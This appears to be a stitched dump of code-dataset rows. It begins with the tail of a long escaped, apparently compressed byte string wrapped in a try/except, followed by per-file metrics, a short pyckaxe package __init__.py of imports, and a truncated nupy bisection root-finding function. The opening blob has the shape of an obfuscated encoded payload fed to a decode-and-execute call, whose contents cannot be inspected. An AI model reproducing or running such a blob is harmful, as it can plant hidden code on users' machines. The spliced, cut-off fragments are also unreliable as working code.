xcdjX7\xb9\x8b\x11\xce\xaf\xa6\xb39\x03\xbf\x9e.\x19\xd0\xbb\x88\tU\xb74lT%\xce\xea\xb9\xde?\x95\xf5\x10\xc9\x03(*m|=1\xb2\xa3\xa3/{\xebzz\xe7\x9705\xac\x86\xde\xc3-\x89\x025S\xa9\xad\xae.\xd1\xc6\xdb\xba\x92\xd8/\t\x87\x8bD\xd2)\xe8\xb5C\'\xc1\xd6-wbW]\xfb)\xf98\x87!\xc5hW\xd3Cy\xfc\xd9\xf6v\x97?\x8ac\xd9!=\xd0VB\x94\x08\x17\xc8\x9f\xb1j26\xfc|\x90\xec 
\x9b\x8d[\xacwO\x17\x83\xeb\xd9WP7+\x19\xa4\x04\x85\xd8Oiu\xda\xec\xdd\xd2G\xc5\x0c\x99\x138\xdePk\x8f"\xa1\xca\xa1;h5\xd7\xf7\x91\xaa\x98A\xcd\xe3\xc5pj\xd4\xa7Xw\xf0O\x8d\xac\x10\x03_\xae\x8ca\xab\xc2\xb9\x17\x87\'T@\x83\th*A\n\xe5\xd7\x93NW\xa5\'?uBf\x8c_Ld\xa9O;\x94\xf1\xb7\xfa\n\xfa\x82\xc6}\x1d\x8b\x1e\xa5\x97\x1a\xb9\xf3\xd4M\x07$\xbeVl\xdeJ\xae\x07]\xf38\x88\xc1\xf6\xde)\x06\x94\x9a\xb9\xaa\xfe\xa2\xe5I\x12\xec\xbe\xe4hZ|\xc4E\x81?6\xd9\x935\xd1Y\xc2\xc4\xf8h\x87U\xab\xd0\xa4Z\xe8A\xf1K\x90Z\x94\xb4\xb9\xc9?4\xef:gQ\x0e\x06X\x8e#\xb8\r\xde\xc9\xab#(@\xec\x8a\xec\x8c\xc8Jdl\x9c\xbc-\xc3\xf0\x03\xcf\xa1\\P(\xd1p\x98\x174\xc8K\xaf\xb4-\xc7\xac\xb7\xb6\x03b\xd8\x84\xd3\xebH\xc6c\x8e\xe2\x92\xd1\x89\xc7[\x07C:\xab\xe8\xba\xeb\xc7(\xa4\xa3\xeb\xe9\x83\xd5\xd5\xd7\xa7\xdb\x03W\x9c@\xba\xd9\x11a\xac\x1a-TM\xe1v\x1b\xa7\x99w6\xc8\x9f\xe3x\x8a=\xd3\xc7\xcb\x8f\xea,\xcd\x8f\x0f\xabG\x8f\xc4\xe9Jc\xcc\xd6\xde/\xf8\xbc\xa7\x8f\xb4&\xa4\xd8\xea0zg\x1f\xd8\xcc\xbe\x8b\x94!g\'\x03(\xb1\xb7\xac.[\xd8&wty\xfb\x9b\x1b\x87;y7\x8a\x18o4\xefhD\x89n\xfd\xc0`\x98b]Q\xa4\xbd\xec\xc1\xbc\xdc\x11\xc2\xb0\xe8<\x17\xcf\xb9\xfd\xf5LO\x01\x0f\xa5\xbfR(\x15_$,\x939d\x83\x9d\x98\x83\xbb\xde\x9f\xcf\xd3\xf2rQ]ZK\x16\x11\xc2\x956%\x00\xb4\xdaJ;\xf1z}\x8c\xc5\xc0\xaf\xb9\xab6Z\xfb\x99\x07\xb8\x1d\xe2/\xe5\xc0\x80K\x9d\xbcX\x7f\xa5\x12Y\xdbg+2M\x97\xe6\xb3\xd3\xeb\xb7\x15\xaaj\xa6\xceE\xc1\xa95\xa1\xc2\t\x83u\xd35w\xf5W\x0c"\xe5\xe8<\x89"\x9f#5\xc5\x9c\xdd\xc0%\r\x0e\x11M^\x8a\x90\'\xb9\xb4\xa1L\x9aS\x11\xd65m\x10\x82\xf5u\x8e\x15\xdfw\xa8\x08P\xbb\xebz\xd4\xacR\x0b\xb16\x1f\x85\xca\xd2\xab\x18\xcd\xef\xe8-\xd3\xc7k\xb5\xcb+\xaf#\xb6R\xeb\xadPSpU\xe0\xae\xeeG\xe99>\xd4J\xb8\x00\x1c\xdab\x0fp\x13\xda4\x83A\xcaQ\xf4\x04\xff\xbcI\xd2\x80$H\xf4=\x98\xfb\xa8\xb3\x87{\xceC\xc4\x175\'\xf2\x070\xd3`\x1f\x99\x15V\x8apY4\xc4\x84\xe6\x84\x9b\x948a\xe8\xc6`\xe41\xcb=\x9e\xe9Ms\xca-n\x966U\xd1\x18\xc5\xcdT\xfe\xb1\xc6\xea\xbd{\xa8~\xa9\xa3*\xa4\xe5\xe5\x8a\xf50\xac\x87U6#\x1a\x93\x85qa~$\x00\xea^S\xb7b\xaaq
\x10\xc5:\xad\xa4N*#\'\xb5\x9e+c\x1d\xab\xc4\xcc\xceM\xd0\xe5~J4\x01\x9c\xe9t`fCk\xd7\xc5\xc8\xa9s\xfa\xb1->\xbd\x07q\n\xd7.\'\xc7w\xe4\xdf_\xec\xde\xf9s+<\xef\x94X\xd6\xd0V\x1bzyP\xcbzW\x8f\x8e\xdab\x03\xf1<=Y\xca\xedM\xb1\xf5\xf0\xc1hxV\r\xfdP\x93@\x07\xd8\x03\xcd\x01H%\x8a\xe9v\xa5`\x85T\xc9\xe6\x11\xfb\xa7b\xcb\xed\x9fh\xe7w\xcc\x00]\x90}\x9c\x98\x92^\x04\xf5\xf8B\xd7\xeb\xc5n(\xd3\x90.\x0fx\xf6\xd1\xfe\x1a\'\xcf\xb26\xf9tv&H\x00W\xe7\xea\xc8\xdf\x15\x05%\xb2\xb5i\xe3\xe3\x82w\xd7+\x15\x8c\xd1\xd8\x99\x07\x1c\xaex\xce\x82\xd3y]/\x7fU9\xd0\x1dsA\x19N\xbd\xc7Z\x9c\xcd\xdd\xf7\xaaJ\xc4o%\xd1\xc9\xef?\xf8\x10\xa9\t\xa9\xe6q6\xca\x06\x071yUt\x07c\xaeV\x1b>P\xe2\x0e?A\x84n~\x80\x9f\xe6\xde\x84P\x85\xfe\x12\xde&\x9f\x98?\xd2<\xf66Y\xf5\xe5\xe20\xe1\x104\n\xe4\xab#N\x08\xfc\x92\xc3\xeb\xdeO\xbc\x97\xf6\xe1\xba&\xa7F\n\xdeD\xed\x88*]\xb2\x1f\xaa\xc1\x1aeOX\xd1;K\x01\xdeD\x05sM\xd7cf\x01\x01\xcf\xe4\xf1\xeb\xe8\x80\x19\xcagF\xd1xq$\\\x95\x8bc\x93\xc0\xb1\x94j\xf1F\xfb-\xe9A~dA\x93\x95(\x8e\xa7\x8e\xfa\xab\x1e\x18\x1c\xe7\xa5\x97UE\xddE\x06\xd0|\x15\x1d9\xf0\xd0\xdc\xc6\x82(\x87\xfb\x03\xffy#AS]\x8eUJ\x9e\xa0\xb2_2)FFE\xd3\xf0\n\x15)\xfdQz\x8aw\xc1\x01\xdd=\xa5\x8a\x1b\x95"pk\x0b$;I\xb7V\xff\x03r\x8a\xf16yC\xe6\xa2;\xc4\xc7\xaf\xf6\xe5\x08^\xeb\x96\xb7\xe1\xc14`\x03\x10\t\xea\xa86Z\xb4\xc2\xaa\xf4hP\x14i\xa7\xa3;TqrY\xd1:\xe3\x96\xc6\x87\x1c\xe9p\xfc\xd2~Hd\xeeP\xe9I\xb7\xd2\xd8\xb0\xcd\xcb\x96&D\xc7\xc8^<Gk\x158C\x9a\xa1\x1a\xf8\xad\x06\x92\xdbH<R\xf4\x04$O\x04Z\xea\x8c\xf3QI\x16\xcc\xcd\xfa\xba\xb7\x94\xc4(\x8c\xd1\x89\xab\xd2\x81P\xcdL>yi0l\xa2:\xa7q(9\xd6+\x93z\xab\xaa\xdb\x1d8\x18N|i\x1b\x99\x86\xe25Tt\xa1f\x84\x13\xe5\x15w\xf7\x9f\x081.\xf4QbWT\xdd\xd1\xc0\xcew\x0c\xa1\xa8\x95d\xe1\xc3\xb1\xc3}-:]\x11\xe8\x1a\t\x0f\xb1\xed\xd6\xa5\x84\xa1)m2\xa0)\xd5\xcd\xef\xd1\xc8\xc3>\r\x1b~\x9d?\x07\xe4\x98\xbf\xa7w,\x88\xe4D\x88\x1b\x9a\x80\xbd<\xb9\x91+_\x8f\x1e_\x1e\x86g1\xc9\x01>\x94~\xe0\x85\xcd\x18\x99J\xe6\xad\x8eq\xaa\xa1P\xbc/\x87\x160\xe7Z\xf8\xdb\xd9\xc0\xe6\xf8O\x8c\x
ce\xe8\x8e\x19\xcd\xf2\xec6\x86\x8e0>N\xa0\x12\x8f=,\xab\xf3F}\x16SF\x1e\xf4\xa7Ta\xe0\x02c\xc8X{\xf5\xff\xbc\x08I\xa4\x9a1U\x01\xe6\xb0\xd5\xf9\xc0B\xbf\xd6>\xeel_\xfe\xc8\xf5\xdfK\x15\xfb\xe4\x04L\xcc\x08\x1f\xd2\xa1Lk\xb5l~\xe3\x95`[m\xb8Is\xf6Y\x0em\xd7\xcai\x10p2`\x8e\x96\x95\xd81\x87\xfd [\x07e/6>6\x05\xe9\x96 \r\xaf\r\xf6\x9a`%3\x85\x9e\xdc\x95B$\x19.\xd2\x8cv\x07s\xc4\xc6\x9a\xeer\xc0\x07k{\x16\x85)\x9ag\xf9\xea\x93N\xf4Ra\t\r\xd4\xb5u\xb5\x8d\x1b\xb7\x19\x11x\x95\x83\x0cJe\x9a\x0b\xca*<\x85V"Q\x1b\x8d1\xc4\xaf0\xbap-\xb7\x8c\x87\xba+^(\x880u\x9a\xbd\x05\xa7\x85\xd1c\xe9V\xb4\x99\xd2v\x0b\xba\xbeF`@g\xf6Px\'\xcf.q\xe6\x81\xfcr\xf5\x1c\xae\xee-pW\xd8C\x83c^AB\xdai\xd5z\xc7-\x00[\x13\xec\xd4Z\xb1\xd9\x88A\xfb\xb3\x95I\xed\x81m1\xc8J\xe0\x16\xc30\xbcb !\xa3(:?\xfd#\xce-\xbb\xb4\xdd\x01\x19*\x81\x16\x8c\xe2\xd3\xb4g\x00\x045\x888O\xba\xe1\x180\xf3]5\xbb\x8c\xea\xe9\xdc\x1b\xf4\x8a2\xbf\x0f\xb3\x8c\x1f\x1a&\x08\xd3\xeb\xa2\xd9\x03\xaa3\xdf\xf4\xa3m\xeb\xd2\x1d\xc1\xf5\x92\xe7\xd8\xec\x0e\x9e\xee\xb1s\x01\xc1E\x9c\xf9\xe1\xc7GuIm\x1c1k7V\xf9d\xf3hQ#q\x80\x92\xaa\xa9\xe5\xe8\x04\xab\x98\xeaFX\x87\xe6`\xa4\xcc\xd4P+Ec\xc8\x0e1Nmv|A\x05\xc4SiLkM\x82yN\xdf_\x1453\x17\x0e\xcc\xb0\xd94\xe6\xfe1\xf9,\xfa\x17\xea\xa4\x91\x9b9{\x0b\xf9eQ\xb3\xe0\x94\xc6M\xec\xb9R&j\xa0\xc7\xcb\x1b\xbf\x15\x8f3\xa4\xd9\x11\xde\xbd\xfd@\x98!\xb6$~\x92\x0c\xe7dU\x1e\xd2&\xfaL\xdc8z\x8d\x83\r@Gv\xf3&\x12\xe4V\x9e\x1e\xc5\x10\xf3bZ\x8f5\xf2\xe8\x980\xe5Z\x92DP\x1ca\x83\xac\x8a\xe0\xa7\x0c\xc50\x0e\xb0.\x1b\x19\x8e\xf1\xe8w?s\x1b\x1a\xd6-\xa6\xf1\x0c\x7f\xf8Xu&r\xcc\xbb\xec\xf8\xa9l\xae\x822\xed\xbfAF\xa0k\xbf(r\xb5\xb9\xbd\xbb\xa8\x9c_\x91\xb7\xacYz/\xf6\x84\x97\x00\xcf[^B0i<K\xc8\xf7\x10C 
\x0b\x84y\xa0\xa8\x9bJ\x15\'U\xf6\xf3\x81\x9e\n7.\x93b\xb3\xf7\xeb\x9e|u3\xc1\xfa\xdd\xb3\xb7\x08\xa8\x83\x13rt#\xe4\xe0\xca\xde\xff\x16db\x0b\x03c\x9d\xaa\xbc\\S\x1dD\x8ef\xfe\xe8\xe1GAf\x82\xa3\xb0\xef\xf1\x0e\x93D]\xbc\x12\n\x06w;\xea\x93S\xb5\xad\xdc\xdbZYBU\xc1\xf5eO\x824|\xd4t\x93}\xd2\xd1\x9e\x1b\x99\xfe0\xe6\xbfl\x0b\xde/\xc1\xda\xcd\r\xea>h\xed\xea\\\xbb\x90\xdb\xd4l-7\xd1\x8b\x04{IB4)\x13\xfa\x8b\xdb\xdf\xa6\x1aZ\xb4\xea\xde]%\r5\x83\x84\xec\xa9XP.\xdd\xae^O\xbc\xda\xce\xf2\xd3o2f`\xf5U\xfc\xfd\xac\x84"e>u\x12X\xb5]\xf6\xfb\xb5\x10bN\x97\xd5\x15\\\x9d2\xab\t\xaed\xe5\xb38\xd3\xd3\xe4U4u\xd3\x81\xc1\xc9<O\xaaa\xd7~\x8a\xa2\x8d\xdc\x90V\x13\xa4Z\xe7\x8c\xcd\xbe\xc0\xf1\xc1m\xabo2\x1b\x82\x8by\xfa\xfe\'\xe6\xa8\x89\x8cU\xb9\xbd\x92>l\x86\xf1\xb1\xc4\x89o$=\x0b\x14\xdf\xe2\tSKXX\xffx%\xdf\x05\xa7\xae\x8f\x89\x8ak\xf5\x1b\x01e\xf9\xf4\x82"\xcfJ\xd2\xb8\x8bH\xb3\x93\x03\\\x19\xd5)\xa5\x02\x01,| |\xfes\'\xeez\x83\xec\xaa\x8e\xf60\x9a\xd3\xd20\xb7\xe9E\x95\xa0|\x85*\x91\xdf\x13[\x82P\x08\xdb\xf4(2f\xb6\xa0\xec?Lw[\xc0\x84N\xcdN\xa4\x90D\xd3\xbf\xb0\x87K\xcf\xcc\xbd\x98\x86\xa0\xe6\xcbx\xff\xa0\xffP\x12b\xa0\x1b\x89\x18\xf8\xd6?\xb9x\x13c\x99\xf1\xfbw\xaa\xf3\xe7\x10w\x14\xb0<\xb0\x029\xc8\x0f\x94&\xa4\x91\x8b\x14\xa1\xde\x1c3\x18B\xc7\xac\x86\xd1\x95\x83\xb7W\xb5#h,\xb3\xbe$\n\xcd\x85\xca;\x9a\x7f\xc3\x07\'&\x86x/\x06\xb6AJY\xa2,\xb9\xc6\xf4\xfe}%/\x17\xd1\xd3\xcd\xda\xec\xde\x97\x83\xb09r~\xc4\xd2N\x0c\xc9\xc6}\x95yb\xfaY\x90\x8bNc\xd2\x1d\x14~\xde\xc68N\xe5\xca\xb1\x98\xf1\xff^P3\xd6\n\x90T\xc7\xda\xca\x97\x87\xd2[\xea\xc0$k+=|rYw\x98\xcf#\xda\xd0\xacf&\x148\xaem\x14\x03\xb4\xbbR&\xaaU\x80\x8ec\xa3\x9ed+Kq\x00\xc4\xe9:\xe7\xfcKO4Jd*^O\r\xbbJ\x1e[\xae\xcb\xb2\xa1\xca\xd7e\xcb\x1d9P\xad\x16\x02\xedC+ED\xb7\x12\r\'\x16c\xf4\xba\x8e.\x87\xd3\xc0Oy\x05\x8dzfgF\xf3\x1bA$D\x01H\x9f\xb5"\xd1\xdbv\x1c\xb4\x1aH=js-\xaf\x91CYo,B\xbf\xb0\xd3\xc8\x8f\x05\xcd7\x1f\x87\xd4\x87\xd2T\xfb\xa1&5\x8e\x02\x1fA\xdb\xb6\xc0\xcc\x94\xfd\xa4|\xb2\xda6\n7\xe4uD\x91\x88\x97\x8e\xbeK/8\x1d
~/\xa4\x012\xb5`$-\xbdx%G\xd1\x86\x8c\xda\xae\x9a\xa6\xa3\xbc\xcc\xf8\xe3\x8c\xc7T\xc5]h\x1f\xf0\xcb[\x1e\xdd\xf8\x17\x81Um\xd5]\xf1\xe5\x9b,\x025\x03\xc0\tk\xba"^\x9c\x95\xf6\x1c#7;E\xac5i\xa1O\xb5\xd8P]o\xf3\xfd\x00\x80\xa4\xf4\x92\x8ag\xab Q\xf6\xc2\x95\x10\x1d\x0eY\xe6\xb0\x87T\xdbH\x16\xa0\x83\x11\xa2\xb3;\xe6g\xfb\x7f\xab\xfd\x8fq\xb0\xbe\xa4"\x8f\xe1)tu\xcb\x82\xcb\x0f\x92\xe9I\x0e/\x0e#V\x1f\xeb\xf5\xec\x93`N\xc5\xc3\x05\xdf\xb1\xe6\xf3\x04\xee\xea\xb2\x16\xb3Uc\x18\xd5@\xad\x12\x14B\xf4\x12n\xe1\xfds\x95f\x9d\x0ez<z\x16\xa9L\x943\xbaaA\x88\xadp`\xf1\xbf\x9b8\x0e\x10K\x93B\xb9\xf4:{\xe6\xbfi,\x86\x1d\xedz\x96c\xd6\xab}\x1d\x96\xf1\xb6~=\x8f\x1d\x94\xf6\xf1F\xfa\x93\xb4\xc1\x91\xe6\x7f\x01\x0ec}\xa8i\xaa\x8f6D\xb2gHzg\xf8x\x92}\xf8L\xe9\x84\x8d\x89\xa2/\xdc\xd4\x05\xa6\xf6\\>\x10\x00Zhj\xce\xe7\x96\xd9\xbd"\x82\x93:\x13)\xcaMd8c\x07\x1d\x17\xc5\xbb\x8c\x10\xee\xf73*\x15\xc4\x8c\x0f\xe1}\x1b\x1as\x971\xed\xe0\xce;\xfd\x96N,\xd3k\x98\x9a\x12L\x88\xbcy\xdd\xf3p\x94\xb71\xae7\xa3\x15\x94\x80\xb5\xca\x8f\n\x07/XY\xfd\x11RH+\xa7\xad\xf0\xc0\xc4\xa0^+cf+\xf0\xbd\x81a~g\x17\x95Wj\xe4\xb5\xe0\xa4U\xa8\xba\x83\xf7ZE7\x14Hld\xbaW\x17j\xe8{\x97`u\xb5o\xe8\x88<.^\x08\x8dJ\x0b\xc8\xc0\xe9\x0cB\xa7\xb7M\xf5\xd6\xc9\xbaN\r\x0b\x9f4\x9f\xbe]\xd7\xf0<\x11\xcee)X\xff&\x9d\xacNW6\x13\xd0\x8d$R\xa0\x91\x05\xd4\x8c\xd1\xbe\x19~\x92\xe9\x87\xb0\x13Q\x16H\xf4\xbe\x94\xa4\x9a\xce\\9y\xc5f\x89\xad\xf2\xed\xc3\xfd\xc5p\x99:P-\xdb\x144\x8d\x9eG\x94\x86q\xb3\x10\xfffV\x03\xe5\xaa\xba\xa7I!\x9b\xd9F\\\xafv\xfdx\n\xc1mM$\x9bp\xbb\xdcx+)\x12m\xab\x90S\x07\xf0\xb6\xaaG>\xc5\x9ea\x99\xb2\xe8l\xa0\x0e\xaa@\xe86\x1a\x82\xc4\xc8\x02\x8e\xf4Xz\x02Jlf+\xe95A\xae$\x02\r\xea\x92\x15\x1f\xcejD_\xd97\x12\xfd\x0b\x81\xa1\x05_u\xa2Q\x18a\xcb\xea\xcf\xe1mBWc\xba>\xe1i\xd5v\t\xc9\xbd\xf5\xdf\x9f\x8bwsu\t\x8eb\xa0\xf3\xd3u\xe5F\x97\xbb#\xea\xd6E\x08\xae\xfc\xe5\x98\xbc\xdb(\xee\x87\x8bY\xb4\x98#y\xa1\nE}\xff\x16\x1c\x82\xd9RS%\xb40\xfbYk\xd9c\xd3\xcc&g\xe4\xe5\xe2\xe6\xe6qO\xe0S\xe0\xbb\xb5\x17Z\xcb\x0ct\x
01r\x94\xbc\xf1\x8a\x9f\xec\x10\xf4\xc5f\xd6\\\xcc\x8b\xe5KI\x88\xd16B\xa2\xf7\xb1D.<\xb0\xeby1t\x19\t\x1b\x8b{\xcaaV\xff+\'"=1\\\xdc\x04P\n\x0b\xba\xb6\x1e[\xfd\x0f\xe1g5\xe6/\xd8\x98\xad\x0eKC\x7f\xb0:ztJ\tL\xbaP_\xc4u\xd5l\xf4\x0c\xab\xe1\xdb\xd2\n\xa8\xf3\x02{mv2-\x8f\x02\x98\xf37p\x9e\xeebz\xa9\x12f\xbd\xb9\xa3f\xcd\xdcW\x99j\xcb\xc9qI\xb2\xa8\x19s\xdf\xf6C\x8d\xe0\x05\xea0y\xcbT8\x87\xe1~_S\x81\\_>9\x96\xd3zO\x16(\xccp c\xf3\xd1\xd6\x18S\xa0\xa6\x84\xad\x181\x0c\xc8sA YC\x13*\xb07+\xec-\xdcW3M\xa2\xb0>\n\xe8\xfb\xe9PZ\xcc\\\xc4\xa1T\x9b@\x80\xc0R\xb2\x07\x99\r\xf4\x0fu\xf1\xc3\x80k\xd5\xa3\xd2\x01\x96\x17p\x80$\x07\x994\x94:\xd2!\xf1>\xdf"\x01\x99B\x11\xab9\xb9Ux\xaa\x17\x7f\x92\x04\xe8\xf4uT7`\xb7_\x1a\t\xcf<\xc1\x8dj~J\xe1\xda@J;\xf1\xf7|9\xb07c\x98%\xac\xd3\x1b\x85EU\xe9\xe3\'\x9a\x98\x89\xc0\x1a\xbaS\x88\xbf,F\xaa\x0e\r"\xab\xdf\xe4\x85\xf4\x0fU\xbb\x08\x8dr\x17\xa3\x8e\x08\xbf0Q\xf6\x85d]L&\xf3"8\xd0\xeb\xcc\xcd\x0fxB\x89\x02p\xaeCB\xdcF8q\xac\x9c\x15\x92PL\xed\x8a\x07ZN\x1f~\xd7\xfa\xcde\x93\x96\x86UI\xa4\xbc\x06\x89\xfe\xaa\x06\xe1d\x10O7\xab\x10A\xbd\xa1\xd4\xdb\x8cFi\xea\xe7\x184\xcc\xd3\xfd\xd9\x0e,Q\x92\xa8\xc6\xf5K0cM\xa2\xc1\x0es\xb9\xd8&\xa70\xc2\xe9\xca[XO\x1b\xeaX\xbc\x98\xb2\xed\x9f)\x99@\xcb>\x87\xe5)\xddS.\x07\x9elU/2s\x05\n\xb3f+\x16\xde\x86\x1b\x18\xd8Wo\xd9*\xad\x8aW\xd5\xac\xf6\x91J\xcc\x91\x0bU$\x8f?\xbe\x12\x86"\xe5\x91q\xf2\nN\xda\tqZ#,EU\xcfO\xad1B\xa8\xb48\xaffV\xff;\xbb\xd4\xda\x8a\\\x91\xb2\xcc&\xe8\xe9\xff,C3\xe2\x80\xb2\xb0\x8e\xc3\xff\xb4\xb2;\xaf"\xdd=:\x1a\x12,\xfa\xfe@\xb5+\x0fj\xfeq&\xd3|n\xce\xe7\x03\x0b\x84\xda@[^\xfd\x053\xd9\xfc\xa4]\xce;\xd5\x9e\xcadt\xe4\nR\x983&\xc8#\x86\xa8b\'\x84^\xca\x08\xfar:\xe8#\xa0\x123p*=\xc2\xb5]\xfe\xb3\x01-\xae?Z\xdd\x03#\xb2\x9d\xa4}e\x88\xce\xdc\x1b\x1f\xfc\xe2\xa4y\xc8KG\xaf_\t\x9eY\xe2\xb4/\x7f\x80\x19\x9a\x90\x11\xf1\\\x97\xb5;\x7f4\x884\n\xe9\x13\xd3\x04mg\x9fH\xad\x92\xc9\x02\x81\x04\xb3\xd6\xbc\x90\xc7\x1a\xdc\x83\x03%\xeaH\xf8\xb3\x1c\r\xbb\xe2\xec\x81\x00&\x1a\x7fP\xd5\x94\r\xff\
xd0q\xe0\xd5\xe7\x97\xd2P\x05\x87\x82\x03R\x01\xa6\x87_=\x17>\x87\xe3\xa5\xee\xd6\x85\xad\'\xd2\x952V\x15;F\x92,\xaa3q\x1a\xab\x90\xa4V\x7fa\x01\'y\xaf\xc9O9K\xab\xc5\x89!\xbd\x03L\x9d\x96\xfbFyc\xf2\x98\x8a\xf0M\xf8\t\x8a\x95\xde?}K\xedF\xfe\x9d\xeao\xd9\xa6\x8c|\xb9vRQ\x92\xe2\x88\xf8R\x9db\xe5=n\xfb\xb5In\xdc\x19\xe0\x8a\xc3\x99\x1a\xbe\xcb-t\xf1\x94\x16\xf3\xa6\x16*\xcd\xf4\x0b\x8e\xc2paZ\xe9\xaeMy$\xb6\x0e_\xa1\xcfu\xf7\x9f\x86\xba\x95^4\x8d\xbe=/\xf4\xdc\xf4\x841\xb4\x9f\xa8D\xd9Tm\x9bI@\x1f\xad\x86Pw\xd5=X\x13\xf8\xbf\x8f"\x10\xfe\xee\x83,<\xbc6v\xfewF\x96I$\xf7\x1dCo\xe2\x94N\xdc\xb9\x17"C\xb7\x88\x8doe\xb9\x10L[kz\x1f\x0c\xa9\xba\xaf\x12\xf0\x80M\xf9\xb3\x01\xd2\xd7\xa5\xbf\xe7\x1b\xf9HW\'\xef\xe0\xcf\x93\x94\x12\x8c7\xc5\xc9\xbd\'\xb7\x7f\xe2O>\x80\xd2\xdd\x9cl\xba\x07\xe7\xb7U\xda\x92[\xdd\x9c\x1ch3\x8dnE\xd9\xe3j`\xba\xed\xec\x1f\x05]:\xf9:\x02\xd6r12-\xd5w%Z\x04=y\x86\xb4\x91\xf3\xe9\xa4\x91N\xb4\r&\x03\x87H\x97\xf3\x9b\'o\xbc\xae~\x82\xdf%O!\x97\\\xea%{\x7fn\xfc\xd2\xf8:Vp\xb1\x88\x08N\x9ez\x94\xb8\xf44\xc1A\x9e\x8f)\xcb\xdf\xcc\xcd\xd6\xe4#\xf4\xb1\xc7\x90\xe77\x99"0\x83C\x8e\xb0-\x99\x94\x84h\xccO\x82\xef\x14\x85\xc4\xc8\x0c\xc8\xa2\xa3\xd8\x8c\xa5\x80\xc6\x7f\tDe\xad\xc4\xa5\x89\x07\xe0\xd3PF\xe7\xc4\x19i\xa586\xfc\xe7l\xb5\xff\xf6\xe8h\xffh\xa8\xf9;$[\xe0dH\x9e\xf0!\x1e\xac\xb1\xc7]!\x08\xd2\x94\xbf\xec\xd1\xf1&\xfc\xf6\xf9\xe5UA\xb2g\x8f\xdd\xd6\x96\xbe\xee\xfd<\xdb:\x88\xff\x7f\xb6\xbb\x15_\xa4\xd7\x05]\x04\xa5\x1d\xbb\xfb\x16V\xdeW_\xec\xb5\x9d\xdb\xffup\xd4\x1d\x87\xaf\xfbo\x11h\xdd\xdf\xda\xdf\xd3\xf7&\xf1\x05\xf2\x83\xa3\xad\xbd\xbe\x8eY\xc3`*s\xfd\x19\xfe\xdf\x97\xf1w\xfa\x13D\xab\x86\xf7\xf9\xf4\xd7~{\xb2\x8b|\x05\x93\xdc\xfc^:\x7f\r\xbe\xbc\xa7G\xdcI\xbdd\xa29]\xe4\x92\x189m\xb6\xf5\xc0;\xab\xb9~\xc5\xffFGG\xff\xaf\xe3g\x18\xba\xfe(C\xf6x\xa8y\xcc\xf7\x7f\xcf\xdf\xba\xbe\xd8\xe7\xcd\xc5\xd0\xad\xd1\xff\x01\xdc\xc2^\xf6\x05\xfe\x01\x00')))
except Exception as b:
print(f'Error for : {b} ')
| 15,790.454545
| 173,536
| 0.734097
| 39,918
| 173,695
| 3.18801
| 0.16812
| 0.00033
| 0.000141
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.228264
| 0.00137
| 173,695
| 11
| 173,537
| 15,790.454545
| 0.505399
| 0.000282
| 0
| 0
| 0
| 32.2
| 0.638884
| 0.637151
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d8c555014d6c345faed3b6ff060a2f717fb32cc
| 164
|
py
|
Python
|
pyckaxe/lib/pack/resource_loader/__init__.py
|
Arcensoth/pyckaxe
|
09ed0828d6660a233b827721454293579329991b
|
[
"MIT"
] | 3
|
2018-09-23T05:16:44.000Z
|
2021-12-23T03:06:07.000Z
|
pyckaxe/lib/pack/resource_loader/__init__.py
|
Arcensoth/pyckaxe
|
09ed0828d6660a233b827721454293579329991b
|
[
"MIT"
] | 5
|
2018-07-11T02:31:56.000Z
|
2018-07-11T03:15:05.000Z
|
pyckaxe/lib/pack/resource_loader/__init__.py
|
Arcensoth/pyckaxe
|
09ed0828d6660a233b827721454293579329991b
|
[
"MIT"
] | null | null | null |
from .abc import *
from .common_resource_loader import *
from .json_resource_loader import *
from .nbt_resource_loader import *
from .text_resource_loader import *
| 27.333333
| 37
| 0.817073
| 23
| 164
| 5.478261
| 0.391304
| 0.31746
| 0.634921
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121951
| 164
| 5
| 38
| 32.8
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0dc59398bbc0f04688049b0f112a10f309082e10
| 11,517
|
py
|
Python
|
nupy/iterative_methods/iterative_methods.py
|
begeistert/nupy
|
b1026afc21b9a985a3329f1a16006aec8fa4d726
|
[
"MIT"
] | null | null | null |
nupy/iterative_methods/iterative_methods.py
|
begeistert/nupy
|
b1026afc21b9a985a3329f1a16006aec8fa4d726
|
[
"MIT"
] | null | null | null |
nupy/iterative_methods/iterative_methods.py
|
begeistert/nupy
|
b1026afc21b9a985a3329f1a16006aec8fa4d726
|
[
"MIT"
] | null | null | null |
from nupy.sympy_algebra import evaluate, derive
from pandas import DataFrame, set_option
def __configure__():
    """Apply the pandas display settings shared by every solver in this module."""
    display_options = (
        ("display.precision", 20),
        ('colheader_justify', 'center'),
    )
    for option_name, option_value in display_options:
        set_option(option_name, option_value)
def intermediate_value(function, variable, intervals, tolerance=1e-10, limit=250, just_root=False):
    """
    Gets the root of the given expression through bisection iterations.
    ====
    Repeatedly halves the interval, keeping the half where the function
    changes sign (intermediate value theorem), and records every step.

    :param function: Expression to iterate
    :param variable: Expression variable
    :param intervals: Iteration interval (a, b); f(a) * f(b) must be negative,
        otherwise no iteration is performed and the result is empty
    :param tolerance: Error tolerance on |f(a) * f(midpoint)|
    :param limit: Iteration limit
    :param just_root: Switch between DataFrame and root
    :return: Return a DataFrame of the iterations if just_root is falsy,
        otherwise return the last midpoint (the root approximation)
    """
    __configure__()
    iterations = {
        'a_n': [],
        'b_n': [],
        'p_n': [],
        'f_n': []
    }
    header = ['a_n', 'b_n', 'p_n', 'f_n']
    fa_1 = intervals[0]
    fb = intervals[1]
    # Sign test: a root is only bracketed when f(a) * f(b) < 0.
    condition = (evaluate(function=function, variable=variable, value=fa_1)
